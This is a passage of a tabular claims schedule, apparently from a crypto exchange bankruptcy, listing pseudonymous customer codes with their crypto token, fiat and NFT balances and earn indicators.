| 07331468 | | BRZ[4], BTC[.00670712], CUSDT[12], DOGE[886.80619283], TRX[2], USD[0.00], USDT[1.11043116] | Yes | |
| 07331469 | | USD[10.00] | | |
| 07331470 | | CUSDT[1], USD[0.00] | | |
| 07331472 | | BRZ[4], BTC[0], CUSDT[7], DOGE[3], ETH[0], GRT[2.07022734], LINK[0], LTC[.03904268], SOL[0], SUSHI[0], TRX[2], UNI[0], USD[0.00], USDT[1.10228399] | Yes | |
| 07331473 | | DOGE[1], USD[0.00] | | |
| 07331474 | | DOGE[.00048358], SHIB[46407.92608178], USD[33.00] | Yes | |
| 07331475 | | DOGE[242.54489276], TRX[1], USD[387.69] | | |
| 07331478 | | BRZ[1], CUSDT[3], ETH[0], SUSHI[0], USD[0.00] | | |
| 07331479 | | DOGE[137.55560872], USD[0.00] | | |
| 07331480 | | DOGE[146.27209476], USD[15.00] | | |
| 07331481 | | USD[10.00] | | |
| 07331483 | | USD[10.00] | | |
| 07331485 | | BTC[0.00005373], DOGE[.757], ETH[.0001], GRT[908.24671582], LINK[42.9], SOL[6.42306], USD[4687.00] | | |
| 07331486 | | BAT[1.01655549], BRZ[4], CUSDT[8], DOGE[2], ETH[.00000001], NFT (2924407018651 00551/Bahrain Ticket Stub #1518)[1], SHIB[7], TRX[5], USD[0.00], USDT[0.00000001] | Yes | |
| 07331487 | | BTC[1.55717405], ETH[.35323985], ETHW[.35314681], LINK[2.11102352], USD[2.93] | Yes | |
| 07331489 | | BAT[0], BTC[0], DOGE[0], ETH[0], LINK[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07331491 | | USD[10.00] | | |
| 07331492 | | USD[10.00] | | |
| 07331493 | | SOL[12.12645355], USD[0.00] | | |
| 07331494 | | USD[10.00] | | |
| 07331495 | | LTC[0.04594939], USD[0.00] | | |
| 07331496 | | CUSDT[1], USD[0.26] | | |
| 07331497 | | DOGE[19.94555548], USD[0.00] | Yes | |
| 07331498 | | BTC[.00006086], CUSDT[3], TRX[2], USD[0.65] | | |
| 07331499 | | USD[0.00] | | |
| 07331501 | | BCH[.00453964], USD[5.10] | | |
| 07331502 | | BAT[5], BRZ[9], CUSDT[6], DOGE[7], GRT[10.9106363], SUSHI[1], TRX[12], USD[0.00], USDT[0] | | |
| 07331503 | | USD[10.00] | | |
| 07331506 | | CUSDT[1], DOGE[2722.25021857], USD[10.00] | | |
| 07331507 | | BAT[.00001892], CUSDT[2], DOGE[1], TRX[2], USD[0.01] | | |
| 07331509 | | USD[10.00] | | |
| 07331510 | | USD[0.00] | | |
| 07331511 | | ETH[.00111269], ETHW[.001099], USD[0.00] | | |
| 07331512 | | CUSDT[1], DOGE[145.15965869], SHIB[989998.77720807], USD[54.20] | Yes | |
| 07331513 | | USD[10.00] | | |
| 07331514 | | USD[10.00] | | |
| 07331515 | | BRZ[7.36248753], BTC[.00183217], CUSDT[53.34958817], DOGE[88.07995513], KSHIB[285.72508508], NEAR[12.54140524], SHIB[1096005.87680945], SUSHI[2.87530876], UNI[0.21527330], USD[-25.00], USDT[0] | Yes | |
| 07331516 | | CUSDT[2], DOGE[448.53158736], SOL[.05231], USD[0.00], USDT[0] | | |
| 07331517 | | USD[10.00] | | |
| 07331518 | | USD[10.00] | | |
| 07331519 | | CUSDT[1], DOGE[160.11374515], USD[0.02] | | |
| 07331520 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07331521 | | USD[0.00] | | |
| 07331523 | | USD[10.00] | | |
| 07331524 | | BTC[0], DOGE[25.82769072], TRX[1], USD[0.00] | | |
| 07331525 | | SHIB[2], USD[0.01], USDT[1.00024651] | Yes | |
| 07331526 | | USD[10.00] | | |
| 07331528 | | BRZ[5.07952967], CUSDT[14], SOL[3.25250259], TRX[6], USD[0.66] | Yes | |
| 07331529 | | USD[10.00] | | |
| 07331530 | | USD[10.00] | | |
| 07331532 | | DOGE[1], USD[0.00] | | |
| 07331533 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07331534 | | CUSDT[2], DOGE[138.19956298], LTC[0.04404987], NFT (390764396087694962/CryptoAvatar #14][1], NFT (485686732802750828/CryptoAvatar #101)[1], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07331535 | | USD[10.00] | | |
| 07331536 | | USD[10.00] | | |
| 07331537 | | BRZ[1], CUSDT[5], DOGE[1140.30084791], GRT[48.52408617], SHIB[1729774.06329891], TRX[528.75991199], USD[0.00] | Yes | |
| 07331538 | | ALGO[0], BTC[0], DOGE[0], ETH[0], ETHW[0.00000058], EUR[0.00], SHIB[8], SOL[0], UNI[0], USD[0.00], USDT[0.00000001], YFI[0] | Yes | |
| 07331539 | | USD[10.00] | | |
| 07331540 | | BTC[0.01358437], CUSDT[1], TRX[1], USD[10.00] | | |
| 07331542 | | USD[10.00] | | |
| 07331543 | | BTC[.00022977], USD[0.00] | | |
| 07331544 | | CUSDT[2], DOGE[5], USD[0.00] | | |
| 07331545 | | BRZ[1], BTC[.00196346], CUSDT[2], DOGE[1396.25892709], ETH[.05140071], ETHW[.05140071], TRX[1], USD[0.00] | | |
| 07331546 | | USD[0.00] | | |
| 07331547 | | DOGE[70.16792939], USD[0.00] | | |
| 07331548 | | DOGE[.88795839], USD[0.01] | | |
| 07331549 | | USD[10.00] | | |
| 07331552 | | CUSDT[259.24371069], TRX[36.56345898], USD[0.00] | Yes | |
| 07331553 | | KSHIB[0], NFT (495734641170770161/Samba Sam)[1], SHIB[8.34880348], SOL[14.94424866], USD[2.00], USDT[0.00000001] | Yes | |
| 07331554 | | USD[10.00] | | |
| 07331555 | | CUSDT[3], ETH[0], SHIB[1], SOL[0], TRX[1], USD[19.57] | | |
| 07331556 | | USD[10.00] | | |
| 07331557 | | USD[10.90] | Yes | |
| 07331558 | | CUSDT[1], USD[44.13] | | |
| 07331559 | | CUSDT[2], LINK[.00002892], TRX[1], USD[0.19] | | |
| 07331560 | | USD[10.00] | | |
| 07331562 | | CUSDT[2], SHIB[638990.73657289], USD[0.00] | | |
| 07331563 | | USD[10.00] | | |
| 07331564 | | USD[10.00] | | |
| 07331565 | | DOGE[34.00184589], USD[0.00] | | |
| 07331566 | | BRZ[1], DOGE[1], USD[0.00] | | |
| 07331567 | | USD[10.00] | | |
| 07331568 | | BTC[.00297514], DOGE[10579.38359805], ETH[.00267392], ETHW[.00264656], GRT[1.00498957], TRX[1], USD[0.00] | Yes | |
| 07331569 | | BTC[0], CUSDT[6], DOGE[0], GRT[0], SOL[0], SUSHI[0], TRX[1], USD[0.00] | | |
| 07331570 | | CUSDT[5], TRX[1], USD[0.00] | | |
| 07331571 | | USD[10.00] | | |
| 07331572 | | USD[10.00] | | |
| 07331573 | | USD[10.00] | | |
| 07331574 | | DOGE[37.8377325], USD[0.00] | | |
| 07331576 | | CUSDT[1], DOGE[0], ETH[0], GRT[0], LTC[0], TRX[0], USD[0.00], USDT[0] | | |
| 07331577 | | CUSDT[8], TRX[1], USD[0.00] | | |
| 07331578 | | BRZ[0], CUSDT[2], DOGE[130.70086235], ETH[0], USD[0.00] | | |
| 07331579 | | BTC[0], CUSDT[10], DOGE[83.94471939], SOL[0], USD[0.06], USDT[0] | Yes | |
| 07331580 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07331581 | | LINK[.38855147], USD[0.00] | | |
| 07331582 | | USD[0.00] | | |
| 07331583 | | USD[10.00] | | |
| 07331584 | | BAT[1.01518252], BRZ[1], CUSDT[1], DOGE[3], SUSHI[.00116064], TRX[4], USD[0.00], USDT[1.07982965] | Yes | |
| 07331585 | | BRZ[2], CUSDT[1], DOGE[1.46817732], USD[0.00] | | |
| 07331586 | | USD[10.00] | | |
| 07331587 | | DOGE[3], ETH[0.30897951], ETHW[0.30879621], USD[0.01] | Yes | |
| 07331588 | | USD[10.00] | | |
| 07331589 | | USD[10.00] | | |
| 07331590 | | USD[10.00] | | |
| 07331591 | | AAVE[0], BAT[1], BCH[0], BRZ[3], BTC[0], DOGE[0], ETH[0.00000104], ETHW[0.00000104], GRT[2], KSHIB[0], LTC[0], MATIC[0], SHIB[5], SOL[0], TRX[1], USD[0.01], USDT[0.00032216] | Yes | |
| 07331592 | | USD[10.00] | | |
| 07331593 | | CUSDT[6], DAI[.81272046], DOGE[1305.77998485], GBP[14.00], PAXG[.0126735], TRX[2], USD[167.27], USDT[4.86018359] | | |
| 07331594 | | USD[10.00] | | |
| 07331595 | | BCH[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07331596 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07331599 | | DOGE[0], ETH[.00003273], ETHW[.00003271], SHIB[3184379.90163459], USD[0.00], USDT[0] | Yes | |
| 07331600 | | USD[10.00] | | |
| 07331603 | | USD[10.00] | | |
| 07331604 | | USD[10.00] | | |
| 07331605 | | DOGE[1.00003968], USD[27.66] | | |
| 07331606 | | USD[10.00] | | |
| 07331607 | | USD[10.00] | | |
| 07331608 | | USD[10.00] | | |
| 07331609 | | USD[10.00] | | |
| 07331610 | | USD[10.00] | | |
| 07331612 | | CUSDT[3], DOGE[1], TRX[1], USD[0.01] | | |
| 07331613 | | TRX[1], USD[0.00] | | |
| 07331614 | | CUSDT[1], TRX[74.20798038], USD[0.00] | Yes | |
| 07331615 | | USD[10.00] | | |
| 07331616 | | USD[10.00] | | |
| 07331617 | | BCH[.00305428], BTC[.00007445], CUSDT[46.8503011], DOGE[11.72118507], TRX[2], USD[0.00], USDT[.99420861] | | |
| 07331618 | | USD[10.00] | | |
| 07331619 | | CUSDT[1], DOGE[2.00001086], TRX[1], USD[0.01] | | |
| 07331620 | | USD[10.00] | | |
| 07331621 | | TRX[10.72611662], USD[0.01] | | |
| 07331622 | | DOGE[1], TRX[1179.72971828], USD[0.00] | Yes | |
| 07331623 | | CUSDT[1], ETH[.0081757], ETHW[.0081757], TRX[162.22078961], USD[0.00] | | |
| 07331624 | | ETH[0], SOL[0] | | |
| 07331625 | | USD[10.00] | | |
| 07331626 | | BRZ[3], CUSDT[3], DOGE[357.28604881], LTC[0], USD[0.00] | | |
| 07331627 | | DOGE[2840.97428508], USD[0.00] | Yes | |
| 07331628 | | CUSDT[3], DOGE[.02205408], TRX[1.00001236], USD[0.00], USDT[1] | | |
| 07331629 | | CUSDT[1], DOGE[0], SHIB[439750.46226415], USD[0.00] | | |
| 07331630 | | CUSDT[9], DOGE[1341.72568323], TRX[1], USD[0.00] | Yes | |
| 07331631 | | DOGE[1], UNI[0], USD[10.00] | | |
| 07331632 | | DOGE[25.68887149], USD[0.00] | | |
| 07331633 | | DOGE[.03326147], USD[0.00] | Yes | |
| 07331634 | | DOGE[1885.33735234], USD[0.01] | | |
| 07331635 | | BTC[0.00017524], USD[0.00] | | |
| 07331636 | | USD[10.00] | | |
| 07331637 | | USD[10.00] | | |
| 07331638 | | BRZ[1], CUSDT[1], DOGE[1], TRX[2], USD[0.00] | | |
| 07331641 | | USD[10.00] | | |
| 07331642 | | BRZ[1], CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07331643 | | BAT[1], BRZ[3], CUSDT[2], SHIB[1], TRX[5], USD[0.00], USDT[1] | | |
| 07331645 | | BAT[15.85078954], TRX[1], USD[0.00] | | |
| 07331646 | | USD[10.00] | | |
| 07331647 | | USD[10.00] | | |
| 07331648 | | USD[10.00] | | |
| 07331649 | | DOGE[19.22692606], USD[0.00] | | |
| 07331650 | | USD[10.00] | | |
| 07331651 | | USD[10.00] | | |
| 07331652 | | ETH[0.00246031], ETHW[0.00246031], USD[0.00] | | |
| 07331653 | | USD[10.00] | | |
| 07331654 | | DOGE[89.75375605], GBP[3.36], USD[0.00] | | |
| 07331655 | | BTC[0], CUSDT[1], DOGE[2], ETH[0], TRX[1], USD[0.00] | | |
| 07331656 | | USD[10.00] | | |
| 07331657 | | USD[10.00] | | |
| 07331658 | | USD[10.00] | | |
| 07331659 | | DOGE[1024.974], USD[0.03] | | |
| 07331661 | | CUSDT[3], DOGE[432.84799490], ETH[0.00037795], ETHW[0.00037795], TRX[.6496459], USD[0.00] | Yes | |
| 07331662 | | USD[10.00] | | |
| 07331663 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07331664 | | DOGE[4.05922679], USD[0.00] | | |
| 07331665 | | BAT[1.0165555], BRZ[6.32337058], CUSDT[12], DOGE[5.01262254], GRT[803.7341647], SHIB[5], TRX[7], USD[0.00], USDT[1.11043116] | Yes | |
| 07331666 | | DOGE[52.14937381], LTC[.15400794], TRX[1], USD[0.00] | Yes | |
| 07331667 | | USD[10.00] | | |
| 07331668 | | BRZ[1], CUSDT[1], DOGE[10506.28945423], KSHIB[3305.82126803], TRX[4407.33992408], USD[10.00] | | |
| 07331670 | | USD[10.00] | | |
| 07331671 | | USD[10.00] | | |
| 07331672 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07331673 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07331674 | | USD[10.00] | | |
| 07331675 | | CUSDT[0], DOGE[0], ETH[0], LINK[0], LTC[0], USD[0.00], USDT[0.00002367] | | |
| 07331676 | | BTC[0], DOGE[0], LTC[0], MATIC[0], SOL[0], USD[0.00] | Yes | |
| 07331678 | | CUSDT[1], DOGE[602.58950763], USD[10.00] | | |
| 07331679 | | USD[10.00] | | |
| 07331680 | | CUSDT[2], DOGE[100], TRX[1], USD[0.00] | | |
| 07331681 | | USD[10.00] | | |
| 07331682 | | USD[10.00] | | |
| 07331683 | | BTC[.0004], USD[1.83] | | |
| 07331684 | | USD[10.00] | | |
| 07331685 | | CUSDT[2], TRX[1.200679], USD[0.00] | | |
| 07331687 | | USD[0.01] | | |
| 07331688 | | USD[10.68] | Yes | |
| 07331689 | | USD[10.00] | | |
| 07331690 | | BAT[2.08803744], BRZ[5.07952967], CUSDT[25], DOGE[3.30210044], GRT[3.141275], SOL[.00008438], TRX[5.62763687], USD[0.00], USDT[0] | Yes | |
| 07331691 | | BAT[1.0165555], CUSDT[4], SHIB[228400.04277821], USD[0.00], USDT[0] | Yes | |
| 07331692 | | USD[10.00] | | |
| 07331693 | | TRX[111.72098354], USD[0.00] | | |
| 07331694 | | USD[10.00] | | |
| 07331695 | | USD[1.00], USDT[0] | | |
| 07331696 | | USD[10.00] | | |
| 07331697 | | BRZ[1], CUSDT[3], SUSHI[0], TRX[0], UNI[0], USD[0.01] | | |
| 07331698 | | USD[10.00] | | |
| 07331699 | | DOGE[.2695327], USD[9.09] | Yes | |
| 07331700 | | USD[10.00] | | |
| 07331701 | | USD[10.00] | | |
| 07331702 | | USD[10.00] | | |
| 07331703 | | BCH[0], BRZ[0], BTC[0], DOGE[0], TRX[0], USD[0.00] | | |
| 07331704 | | USD[33.04] | Yes | |
| 07331705 | | CUSDT[6], DOGE[1.00007869], TRX[1], USD[0.00] | | |
| 07331706 | | BRZ[1], DOGE[1], USD[0.00] | | |
| 07331707 | | BRZ[1], TRX[1], USD[0.01] | | |
| 07331708 | | DOGE[719], ETH[.00619681], ETHW[.00619681], USD[0.00] | | |
| 07331709 | | BAT[2.13077446], BRZ[8.8763866], BTC[.00009616], CUSDT[13.00004518], DOGE[1.00037438], ETH[.00023903], ETHW[.00023903], LTC[.08671986], SOL[.0001278], TRX[8.00001615], USD[0.01], USDT[2.21909676] | Yes | |
| 07331710 | | CUSDT[2], SOL[.00038838], USD[10.45] | | |
| 07331711 | | SOL[.04471248], USD[0.00] | Yes | |
| 07331712 | | USD[10.00] | | |
| 07331713 | | USD[0.01] | | |
| 07331715 | | BAT[.00007475], BRZ[5.07952967], CUSDT[9], DOGE[18.91260401], ETH[0], GRT[.00005619], SHIB[2], SOL[0], SUSHI[.0000187], TRX[10.01202611], UNI[.0000189], USD[0.00], USDT[0] | Yes | |
| 07331716 | | USD[10.00] | | |
| 07331717 | | BRZ[1], DOGE[269.65060383], SHIB[26988.1252249], TRX[1], USD[0.10] | | |
| 07331718 | | CUSDT[1], USD[0.01] | | |
| 07331719 | | USD[10.00] | | |
| 07331721 | | BRZ[4], CUSDT[9], DOGE[6.00105101], TRX[140.92727557], USD[0.00], USDT[3] | | |
| 07331722 | | BRZ[2], BTC[0], CUSDT[2], DOGE[3], ETH[.0000001], TRX[7], USD[0.00] | | |
| 07331724 | | CUSDT[3], DOGE[44008.58141312], SHIB[47252725.38811102], USD[0.00], USDT[14009.73306523] | Yes | |
| 07331725 | | USD[10.00] | | |
| 07331726 | | USD[10.81] | Yes | |
| 07331727 | | DOGE[1.00009477], USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07331728 | | USD[0.26] | | |
| 07331729 | | BRZ[1], CUSDT[1], DOGE[6.19691472], ETH[.02400596], ETHW[.023705], LTC[.12627945], USD[0.00] | Yes | |
| 07331730 | | USD[10.00] | | |
| 07331731 | | USD[10.00] | | |
| 07331732 | | USD[10.00] | | |
| 07331733 | | USD[10.00] | | |
| 07331734 | | USD[10.00] | | |
| 07331735 | | CUSDT[38.28184101], USD[0.00] | | |
| 07331736 | | USD[10.00] | | |
| 07331737 | | USD[10.00] | | |
| 07331738 | | CUSDT[1.2316159], DOGE[1], USD[0.01] | | |
| 07331739 | | BAT[0], BCH[0], BTC[0], CUSDT[3], DOGE[0], ETH[0], ETHW[0], GRT[0], LTC[0], MATIC[.00017113], SOL[0], SUSHI[0], TRX[1], UNI[0], USD[0.00] | Yes | |
| 07331740 | | USD[10.00] | | |
| 07331741 | | DOGE[3.044223], USD[0.00] | | |
| 07331743 | | USD[10.00] | | |
| 07331745 | | USD[10.00] | | |
| 07331746 | | BCH[.01139248], GRT[5.65783643], USD[0.00] | Yes | |
| 07331747 | | DOGE[0], USD[0.01] | | |
| 07331748 | | USD[10.00] | | |
| 07331749 | | USD[10.00] | | |
| 07331751 | | DOGE[2], SOL[0], USD[0.00] | Yes | |
| 07331752 | | DOGE[0], ETH[1.31959606], ETHW[1.31959606], SHIB[6396.76667652], USD[0.00], USDT[0] | | |
| 07331753 | | DOGE[136.23866581], USD[0.00] | | |
| 07331754 | | USD[10.00] | | |
| 07331756 | | BTC[.00016108], DOGE[1], SHIB[1], SOL[16.25903796], SUSHI[.0028664], USD[0.00] | Yes | |
| 07331757 | | BTC[.00070899], CUSDT[2], DOGE[77.84278089], USD[0.00] | | |
| 07331758 | | USD[10.00] | | |
| 07331759 | | USD[10.00] | | |
| 07331760 | | BTC[0.00003349], DOGE[1265.025], LTC[0], SUSHI[.996], TRX[1.998], UNI[.996], USD[2.40] | | |
| 07331761 | | DOGE[48.76885285], USD[0.00] | Yes | |
| 07331762 | | USD[10.00] | | |
| 07331763 | | USD[10.00] | | |
| 07331764 | | CUSDT[2], USD[0.02] | | |
| 07331768 | | CUSDT[1], DOGE[1.21030447], USD[106.32] | | |
| 07331769 | | USD[10.00] | | |
| 07331770 | | BRZ[1], USD[0.00] | | |
| 07331771 | | BAT[1], BRZ[2], USD[0.01] | | |
| 07331772 | | BRZ[0], CUSDT[1], SOL[1.03721019], USD[0.00] | | |
| 07331773 | | USD[10.00] | | |
| 07331774 | | USD[10.00] | | |
| 07331775 | | USD[10.00] | | |
| 07331777 | | USD[10.00] | | |
| 07331778 | | USD[10.00] | | |
| 07331779 | | USD[10.00] | | |
| 07331780 | | DOGE[1], USD[0.00] | | |
| 07331781 | | BAT[1], CUSDT[1], USD[0.01] | | |
| 07331782 | | BRZ[4], CUSDT[18], DOGE[200.79579548], LINK[1.01100927], LTC[.28968488], SHIB[2], TRX[2], USD[0.01] | | |
| 07331783 | | USD[10.00] | | |
| 07331784 | | BRZ[1], BTC[.02802997], CUSDT[15], DOGE[1530.43613369], ETH[.14149336], ETHW[.14149336], GRT[1], LINK[5.09680709], LTC[6.76080811], MATIC[7.95880978], PAXG[.5429823], SHIB[3152318.69538452], TRX[3], USD[0.00] | | |
| 07331785 | | BAT[1], TRX[2], USD[0.00], USDT[0] | | |
| 07331786 | | DOGE[0], SHIB[7], USD[0.00], USDT[0.00000001] | Yes | |
| 07331788 | | USD[10.00] | | |
| 07331789 | | DOGE[1680.75678911], TRX[191.59433501], USD[0.00] | | |
| 07331790 | | BAT[1.01655549], BRZ[1], CUSDT[1], SHIB[7309319.14621916], USD[0.00] | Yes | |
| 07331791 | | USD[10.00] | | |
| 07331792 | | CUSDT[3], DOGE[2901.12293564], TRX[28.38162507], USD[0.04] | | |
| 07331793 | | USD[10.00] | | |
| 07331794 | | BRZ[0], BTC[0], DOGE[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07331795 | | BRZ[1], CUSDT[6], DOGE[1.01952444], GRT[1.00367791], TRX[1], USD[0.00] | Yes | |
| 07331796 | | TRX[206.9398521], USD[0.00] | | |
| 07331797 | | USD[10.00] | | |
| 07331799 | | USD[10.00] | | |
| 07331800 | | DOGE[1], USD[0.01] | | |
| 07331801 | | USD[10.00] | | |
| 07331802 | | USD[10.00] | | |
| 07331803 | | USD[10.00] | | |
| 07331804 | | USD[10.00] | | |
| 07331805 | | USD[0.01] | | |
| 07331806 | | CUSDT[3], DOGE[312.2011681], ETH[.00123693], ETHW[.00122325], LTC[.13053475], SHIB[384072.34220295], SOL[1.15699166], TRX[2], USD[0.27] | Yes | |
| 07331807 | | USD[0.00] | | |
| 07331808 | | ETH[.00598159], ETHW[.00591319], USD[0.00] | Yes | |
| 07331809 | | USD[10.00] | | |
| 07331810 | | SHIB[1955095.74707383], USD[0.09] | Yes | |
| 07331812 | | USD[0.00] | | |
| 07331814 | | USD[10.00] | | |
| 07331816 | | NFT (331724934874502220/Megalodon Rogue Shark Tooth)[1], NFT (346993865302097385/SolBunnies #132)[1], NFT (417257447297088221/SolBunnies #2130)[1], SOL[0.03777500], USD[0.00] | Yes | |
| 07331817 | | USD[10.00] | | |
| 07331818 | | USD[10.00] | | |
| 07331819 | | DOGE[.074], USD[0.00] | | |
| 07331820 | | USD[10.00] | | |
| 07331821 | | BTC[.00029184], DOGE[2957.4193364], ETH[.01095836], ETHW[.01095836], SHIB[3697184.09859154], USD[0.00] | | |
| 07331822 | | USD[10.00] | | |
| 07331823 | | BAT[1], DOGE[1], USD[11.37] | | |
| 07331824 | | USD[10.00] | | |
| 07331825 | | USD[10.00] | | |
| 07331826 | | USD[10.00] | | |
| 07331827 | | USD[10.00] | | |
| 07331828 | | USD[0.00] | | |
| 07331829 | | BF_POINT[100], BTC[0.18934932], GRT[0], USD[0.00] | Yes | |
| 07331830 | | DOGE[1], USD[0.01] | | |
| 07331831 | | CUSDT[10], DOGE[260.66239868], SHIB[596391.82943193], TRX[3], USD[0.00] | | |
| 07331832 | | BTC[.00162387], CUSDT[3], DOGE[379.030461], ETH[.05285535], ETHW[.05285535], KSHIB[207.67339343], LINK[.65225351], LTC[.3382617], MATIC[37.03242361], SHIB[2], SOL[1.01651014], SUSHI[1.01015137], TRX[41.06766758], UNI[1.14901822], USD[0.00], USDT[.99410928] | | |
| 07331833 | | TRX[1], USD[0.01] | | |
| 07331834 | | CUSDT[2], DOGE[0], SOL[0], USD[0.00] | Yes | |
| 07331835 | | DOGE[1], USD[0.00] | | |
| 07331837 | | BAT[1.0165555], BRZ[3], CUSDT[26], DOGE[8.32482742], GRT[.00056024], LINK[5.96011455], MATIC[.00064585], SOL[.00000183], SUSHI[.00003863], TRX[18.43370199], UNI[.00004231], USD[0.00] | Yes | |
| 07331838 | | BAT[1], BTC[.00000001], DOGE[1], ETH[0], ETHW[0], GRT[0], NFT (532580824520148376/Bahrain Ticket Stub #305)[1], SHIB[184.61627154], SOL[0], TRX[2], USD[0.00] | Yes | |
| 07331839 | | BRZ[2], CUSDT[5], DOGE[3484.84800417], GRT[.00003664], SHIB[1], TRX[8466.32781624], USD[0.02], USDT[1.011832] | Yes | |
| 07331841 | | USD[10.00] | | |
| 07331842 | | USD[10.00] | | |
| 07331843 | | BAT[1], CUSDT[1], GRT[2], TRX[6], USD[0.01] | | |
| 07331844 | | USD[10.00] | | |
| 07331845 | | USD[10.00] | | |
| 07331846 | | DOGE[33.49156711], USD[10.00] | | |
| 07331847 | | USD[11.06] | Yes | |
| 07331848 | | CUSDT[1], DOGE[4856.30678493], TRX[1], USD[10.00] | | |
| 07331849 | | USD[5.53] | | |
| 07331850 | | BAT[.36219111], BRZ[3], CUSDT[29], DOGE[1.74585788], ETH[.00030324], ETHW[.00030324], GRT[1.91321854], SHIB[439486.13928329], SOL[.1052592], SUSHI[.1912947], USD[0.67] | | |
| 07331851 | | DOGE[135.07697901], USD[0.00] | | |
| 07331853 | | DOGE[133.30839577], USD[0.00] | | |
| 07331854 | | USD[0.43], USDT[0] | | |
| 07331855 | | BTC[0], CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07331856 | | BRZ[1], CUSDT[2], DOGE[1325.79573344], GRT[21.36967623], TRX[259.93230582], USD[0.00] | | |
| 07331857 | | USD[10.00] | | |
| 07331858 | | BRZ[0], BTC[.00000058], DOGE[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07331859 | | CUSDT[11.88052146], DOGE[0.00000067], USD[0.00] | | |
| 07331860 | | BRZ[1], BTC[.00021045], CUSDT[2], TRX[3], USD[0.00], USDT[1] | | |
| 07331861 | | BTC[0], DOGE[1], ETH[0], ETHW[0], USD[0.00] | | |
| 07331862 | | BAT[10.57753398], BRZ[249.75100894], CUSDT[2], DOGE[96.02711416], KSHIB[309.39569959], MATIC[6.99277572], MKR[.00482319], SHIB[4505979.40235125], SUSHI[1.25090558], TRX[693.54965226], USD[186.95], USDT[0.00000001], YFI[.00049932] | Yes | |
| 07331863 | | BRZ[1], CUSDT[13], ETH[.21950596], ETHW[.21928796], SHIB[1], SOL[1.01818071], USD[0.00] | Yes | |
| 07331864 | | BTC[0], CUSDT[5], DOGE[0.00009155], ETH[0.07386454], ETHW[0.07386454], LTC[.15879005], SHIB[1], TRX[311.66074002], USD[2.68] | | |
| 07331865 | | USD[10.00] | | |
| 07331866 | | USD[10.00] | | |
| 07331867 | | USD[0.00] | | |
| 07331868 | | CUSDT[2], USD[2.25] | | |
| 07331869 | | TRX[2], USD[0.00] | | |
| 07331870 | | NFT (436044646978332336/Entrance Voucher #251)[1], TRX[1], USD[0.00] | Yes | |
| 07331871 | | USD[11.06] | Yes | |
| 07331872 | | BRZ[2], CUSDT[2], TRX[1], USD[0.01], USDT[1] | | |
| 07331873 | | DOGE[308.88590411], USD[0.00] | | |
| 07331874 | | CUSDT[2], DOGE[39.45502152], USD[0.00] | | |
| 07331876 | | BTC[0.00008838], DOGE[.3176], ETH[.00072689], ETHW[.00072689], MATIC[.9], SOL[.005768], TRX[.000008], USD[204.77], USDT[0.34075537] | | |
| 07331877 | | USD[10.00] | | |
| 07331878 | | BTC[.0157748], DOGE[8932.1261182], USD[3.07] | | |
| 07331879 | | USD[0.00] | | |
| 07331880 | | USD[10.00] | | |
| 07331881 | | USD[0.00] | | |
| 07331882 | | CUSDT[3], DOGE[0], USD[0.00] | | |
| 07331883 | | USD[10.00] | | |
| 07331884 | | USD[0.01], USDT[0] | | |
| 07331885 | | USD[10.00] | | |
| 07331886 | | USD[10.00] | | |
| 07331887 | | USD[10.00] | | |
| 07331888 | | USD[10.00] | | |
| 07331889 | | USD[10.00] | | |
| 07331890 | | USD[10.00] | | |
| 07331891 | Contingent, Disputed | USD[0.00] | Yes | |
| 07331892 | | CUSDT[1], DOGE[7532.76267953], TRX[1], USD[0.00] | | |
| 07331893 | | USD[10.00] | | |
| 07331894 | | USD[0.01] | | |
| 07331895 | | USD[10.00] | | |
| 07331896 | | USD[10.00] | | |
| 07331897 | | CUSDT[1], DOGE[2505.24000026], USD[0.00] | | |
| 07331898 | | USD[10.00] | | |
| 07331899 | | USD[10.00] | | |
| 07331900 | | ALGO[0], NFT (303981870707719502/Astral Apes #762)[1], NFT (320531326728684092/Astral Apes #3293)[1], NFT (367366086531220713/#6086)[1], NFT (406974983673935007/Fancy Frenchies #7669)[1], NFT (466789871801560164/3D SOLDIER #3323)[1], NFT (571167865980593560/DOTB #4597)[1], SHIB[19532.04451063], USD[0.00] | Yes | |
| 07331901 | | ETHW[10.51176785], USD[0.00] | Yes | |
| 07331903 | | BTC[0], DOGE[0.00067945], ETH[0], ETHW[0], SOL[0.12903139], USD[0.00] | Yes | |
| 07331904 | | BRZ[1], CUSDT[3], DOGE[111.25134821], USD[0.37] | | |
| 07331905 | | DOGE[18.3765519], USD[0.00] | | |
| 07331906 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07331907 | | BAT[1.01655549], BRZ[1], CUSDT[3], DOGE[1], ETH[0], ETHW[0], GRT[1.00498957], TRX[1], USD[0.00] | Yes | |
| 07331908 | | GRT[4.73018148], USD[0.00] | | |
| 07331909 | | CUSDT[468.22573349], USD[0.00] | | |
| 07331910 | | CUSDT[2], TRX[126.97512531], USD[0.01] | Yes | |
